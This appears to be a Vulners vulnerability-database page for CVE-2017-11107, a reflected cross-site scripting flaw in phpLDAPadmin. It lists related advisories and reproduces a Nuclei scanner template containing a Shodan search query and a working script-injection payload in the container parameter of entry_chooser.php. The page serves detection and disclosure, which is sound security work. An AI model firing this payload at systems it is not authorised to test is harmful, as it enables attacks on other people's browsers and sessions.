| Reporter | Title | Published | Views | Family All 40 |
|---|---|---|---|---|
| CVE-2017-11107 | 8 Jul 201712:00 | – | alpinelinux | |
| CVE-2017-11107 | 31 Dec 202521:03 | – | circl | |
| Cross-site scripting vulnerability in phpLDAPadmin htdocs/entry_chooser.php file | 10 Jul 201700:00 | – | cnvd | |
| CVE-2017-11107 | 8 Jul 201712:00 | – | cve | |
| CVE-2017-11107 | 8 Jul 201712:00 | – | cvelist | |
| [SECURITY] [DLA 1019-1] phpldapadmin security update | 9 Jul 201714:24 | – | debian | |
| [SECURITY] [DLA 1561-1] phpldapadmin security update | 31 Oct 201818:11 | – | debian | |
| CVE-2017-11107 | 8 Jul 201712:00 | – | debiancve | |
| Debian DLA-1019-1 : phpldapadmin security update | 10 Jul 201700:00 | – | nessus | |
| Debian DLA-1561-1 : phpldapadmin security update | 1 Nov 201800:00 | – | nessus |
id: CVE-2017-11107
info:
name: phpLDAPadmin <= 1.2.3 - Reflected XSS
author: 0x_Akoko
severity: medium
description: |
phpLDAPadmin <= 1.2.3 contains a reflected cross-site scripting caused by unsanitized input in htdocs/entry_chooser.php via the form, element, rdn, or container parameter, letting attackers execute malicious scripts in victim browsers, exploit requires sending crafted input.
impact: |
Attackers can execute malicious scripts in victim browsers, potentially leading to session hijacking or defacement.
remediation: |
Update to the latest version of phpLDAPadmin where the vulnerability is fixed.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-11107
- https://github.com/leenooks/phpLDAPadmin/issues/50
- https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=867719
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-11107
epss-score: 0.02069
epss-percentile: 0.78946
cwe-id: CWE-79
cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: phpldapadmin_project
product: phpldapadmin
shodan-query: html:"phpLDAPadmin"
tags: cve,cve2017,phpldapadmin,xss,unauth
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/phpldapadmin/"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "phpLDAPadmin")'
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/phpldapadmin/entry_chooser.php?container=%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "<script>alert(document.domain)</script>", "Entry Chooser")'
condition: and
# digest: 4b0a00483046022100d91e90b67dd38423a3c8021a8f6f46aa88cfda7d38fb02a5a23ad6994aad7502022100dcb374c23691c282424f72d6b7dffe0ba3772afc1e1cdc3f4710d1e0a712654d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation